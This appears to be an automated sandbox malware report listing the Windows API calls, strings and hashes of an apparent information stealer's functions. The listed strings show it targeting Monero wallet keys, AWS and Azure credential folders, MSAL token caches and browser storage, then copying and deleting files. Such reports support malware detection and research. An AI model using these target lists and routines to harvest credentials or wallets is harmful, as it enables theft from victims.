                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                                  • String ID: %s%s
                                  • API String ID: 2672039231-3252725368
                                  • Opcode ID: 2add89e1252de99de362ac3b6f1dcf575a75010ba29e626c63dbc22d7aee4234
                                  • Instruction ID: f220e81a728668bf9e7abaf6756185051d27c47b1f64f115d51d2db57fe82caa
                                  • Opcode Fuzzy Hash: 2add89e1252de99de362ac3b6f1dcf575a75010ba29e626c63dbc22d7aee4234
                                  • Instruction Fuzzy Hash: 82F19FB1A01214AFCB15DB68DD48AEAB7B9EF98300F144599F909E7350DF70AE44DFA0
                                  Function 00301F79 Relevance: 54.4, APIs: 36, Instructions: 407stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00301F9F
                                  • lstrlen.KERNEL32(01028990), ref: 00301FAE
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00301FDB
                                  • lstrcat.KERNEL32(00000000,?), ref: 00301FE3
                                  • lstrlen.KERNEL32(00331794), ref: 00301FEE
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030200E
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 0030201A
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00302042
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0030204D
                                  • lstrlen.KERNEL32(00331794), ref: 00302058
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00302075
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 00302081
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003020AC
                                  • lstrlen.KERNEL32(?), ref: 003020E4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00302104
                                  • lstrcat.KERNEL32(00000000,?), ref: 00302112
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00302139
                                  • lstrlen.KERNEL32(00331794), ref: 0030214B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030216B
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 00302177
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030219D
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003021A8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003021D4
                                  • lstrlen.KERNEL32(?), ref: 003021EA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030220A
                                  • lstrcat.KERNEL32(00000000,?), ref: 00302218
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00302242
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0030227F
                                  • lstrlen.KERNEL32(0102CBA0), ref: 0030228D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003022B1
                                  • lstrcat.KERNEL32(00000000,0102CBA0), ref: 003022B9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003022F7
                                  • lstrcat.KERNEL32(00000000), ref: 00302304
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030232D
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00302356
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00302382
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003023BF
                                  • DeleteFileA.KERNEL32(00000000), ref: 003023F7
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 00302444
                                  • FindClose.KERNEL32(00000000), ref: 00302453
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                                  • String ID:
                                  • API String ID: 2857443207-0
                                  • Opcode ID: 25ac88799175fd2130d95ae45d89c830d610f9309a8e58095bb525fd0ca2cf87
                                  • Instruction ID: bafcdd8cc4736cac96b3efe39b92c042a70cd5bb67f748c7d7b4f04c4f5beb14
                                  • Opcode Fuzzy Hash: 25ac88799175fd2130d95ae45d89c830d610f9309a8e58095bb525fd0ca2cf87
                                  • Instruction Fuzzy Hash: E8E13071A126169BCB23EFA8DD9DAAF77B9AF14300F054064F805AB291DF34DD19CB90
                                  Function 00316410 Relevance: 52.9, APIs: 29, Strings: 1, Instructions: 438stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00316445
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00316480
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003164AA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003164E1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00316506
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0031650E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00316537
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$FolderPathlstrcat
                                  • String ID: \..\
                                  • API String ID: 2938889746-4220915743
                                  • Opcode ID: a5384f9305bcc0049d2a5ba93280c218eb5f8a207e1248d3a8bd99a9952aeb08
                                  • Instruction ID: 6635a4e65d85b40081cbf92391d1c71fd7b32f7ed61edfdf5db2d0200ef65fff
                                  • Opcode Fuzzy Hash: a5384f9305bcc0049d2a5ba93280c218eb5f8a207e1248d3a8bd99a9952aeb08
                                  • Instruction Fuzzy Hash: 54F18F70A116169BCB27EFA8D85AAAF77B9AF48300F054128F855DB291DF34DC85CB90
                                  Function 00314370 Relevance: 49.3, APIs: 26, Strings: 2, Instructions: 334stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 003143A3
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 003143D6
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003143FE
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00314409
                                  • lstrlen.KERNEL32(\storage\default\), ref: 00314414
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00314431
                                  • lstrcat.KERNEL32(00000000,\storage\default\), ref: 0031443D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00314466
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00314471
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00314498
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003144D7
                                  • lstrcat.KERNEL32(00000000,?), ref: 003144DF
                                  • lstrlen.KERNEL32(00331794), ref: 003144EA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00314507
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 00314513
                                  • lstrlen.KERNEL32(.metadata-v2), ref: 0031451E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031453B
                                  • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 00314547
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031456E
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003145A0
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 003145A7
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00314601
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031462A
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00314653
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031467B
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 003146AF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                                  • String ID: .metadata-v2$\storage\default\
                                  • API String ID: 1033685851-762053450
                                  • Opcode ID: ae140fa53805f19f0d3a4018d4ef119675f2d4475c5c879a55905fdd51cd423f
                                  • Instruction ID: 55c9f9464ccddce52c557375d5d108c7552e075072522f801ea9a24e5ebaecbb
                                  • Opcode Fuzzy Hash: ae140fa53805f19f0d3a4018d4ef119675f2d4475c5c879a55905fdd51cd423f
                                  • Instruction Fuzzy Hash: D4B18070A126069BCB27EF78DD9DAAF77A9AF18300F050124F845EB291DF34DC558B90
                                  Function 003157A0 Relevance: 45.5, APIs: 30, Instructions: 486stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 003157D5
                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00315804
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00315835
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031585D
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00315868
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00315890
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003158C8
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003158D3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003158F8
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0031592E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00315956
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00315961
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00315988
                                  • lstrlen.KERNEL32(00331794), ref: 0031599A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003159B9
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 003159C5
                                  • lstrlen.KERNEL32(0102CB10), ref: 003159D4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003159F7
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00315A02
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00315A2C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00315A58
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 00315A5F
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00315AB7
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00315B2D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00315B56
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00315B89
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00315BB5
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00315BEF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00315C4C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00315C70
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                                  • String ID:
                                  • API String ID: 2428362635-0
                                  • Opcode ID: 40c325375b33a40efabdefb2f0ea04d371d7828a6d586f5494596bf29bfa2183
                                  • Instruction ID: 911f9eef46ca0c1fca3d2bfccbb48fd206f4f4e323a01d69d0748a41a45f5d45
                                  • Opcode Fuzzy Hash: 40c325375b33a40efabdefb2f0ea04d371d7828a6d586f5494596bf29bfa2183
                                  • Instruction Fuzzy Hash: 5E029171A11605DFCB27EF68C899AEF77B5AF98300F054128F805AB290DB74DD89CB90
                                  Function 00301190 Relevance: 42.3, APIs: 22, Strings: 2, Instructions: 280stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00301120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00301135
                                    • Part of subcall function 00301120: RtlAllocateHeap.NTDLL(00000000), ref: 0030113C
                                    • Part of subcall function 00301120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00301159
                                    • Part of subcall function 00301120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00301173
                                    • Part of subcall function 00301120: RegCloseKey.ADVAPI32(?), ref: 0030117D
                                  • lstrcat.KERNEL32(?,00000000), ref: 003011C0
                                  • lstrlen.KERNEL32(?), ref: 003011CD
                                  • lstrcat.KERNEL32(?,.keys), ref: 003011E8
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0030121F
                                  • lstrlen.KERNEL32(01028990), ref: 0030122D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00301251
                                  • lstrcat.KERNEL32(00000000,01028990), ref: 00301259
                                  • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 00301264
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00301288
                                  • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 00301294
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003012BA
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 003012FF
                                  • lstrlen.KERNEL32(0102CBA0), ref: 0030130E
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00301335
                                  • lstrcat.KERNEL32(00000000,?), ref: 0030133D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00301378
                                  • lstrcat.KERNEL32(00000000), ref: 00301385
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003013AC
                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 003013D5
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00301401
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0030143D
                                    • Part of subcall function 0031EDE0: lstrcpy.KERNEL32(00000000,?), ref: 0031EE12
                                  • DeleteFileA.KERNEL32(?), ref: 00301471
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                                  • String ID: .keys$\Monero\wallet.keys
                                  • API String ID: 2881711868-3586502688
                                  • Opcode ID: b2bb85848d2e1f804a08141652b387635bef9e5580b970fa082121b9f814dac1
                                  • Instruction ID: d2113ede61696f749195f780e134ad7f7a7a9f80d97699dff21bbc08d4574755
                                  • Opcode Fuzzy Hash: b2bb85848d2e1f804a08141652b387635bef9e5580b970fa082121b9f814dac1
                                  • Instruction Fuzzy Hash: A6A17F71A122069BCB23EBB8DC99AAF77B9AF54300F050464F905EB291DF34DD19DB90
                                  Function 0031E720 Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 199stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 0031E740
                                  • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0031E769
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031E79F
                                  • lstrcat.KERNEL32(?,00000000), ref: 0031E7AD
                                  • lstrcat.KERNEL32(?,\.azure\), ref: 0031E7C6
                                  • memset.MSVCRT ref: 0031E805
                                  • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0031E82D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031E85F
                                  • lstrcat.KERNEL32(?,00000000), ref: 0031E86D
                                  • lstrcat.KERNEL32(?,\.aws\), ref: 0031E886
                                  • memset.MSVCRT ref: 0031E8C5
                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0031E8F1
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031E920
                                  • lstrcat.KERNEL32(?,00000000), ref: 0031E92E
                                  • lstrcat.KERNEL32(?,\.IdentityService\), ref: 0031E947
                                  • memset.MSVCRT ref: 0031E986
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$memset$FolderPathlstrcpy
                                  • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                  • API String ID: 4067350539-3645552435
                                  • Opcode ID: 35e7fb4ab7f949e96bf7a7ee0eb79cae71a41e22787269d887e74153d55a9201
                                  • Instruction ID: 698f84f5739766e8fff84faf213264bbece7daad20461924aefb6c83a6a11fd0
                                  • Opcode Fuzzy Hash: 35e7fb4ab7f949e96bf7a7ee0eb79cae71a41e22787269d887e74153d55a9201
                                  • Instruction Fuzzy Hash: C371C971E50219ABDB27EB64DC4AFED7774AF58700F040494B6199F1C1DFB0AA888B54
                                  Function 0031ABB2 Relevance: 39.3, APIs: 25, Strings: 1, Instructions: 297stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32 ref: 0031ABCF
                                  • lstrlen.KERNEL32(0102DCB8), ref: 0031ABE5
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031AC0D
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0031AC18
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031AC41
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031AC84
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0031AC8E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031ACB7
                                  • lstrlen.KERNEL32(00334AD4), ref: 0031ACD1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031ACF3
                                  • lstrcat.KERNEL32(00000000,00334AD4), ref: 0031ACFF
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031AD28
                                  • lstrlen.KERNEL32(00334AD4), ref: 0031AD3A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031AD5C
                                  • lstrcat.KERNEL32(00000000,00334AD4), ref: 0031AD68
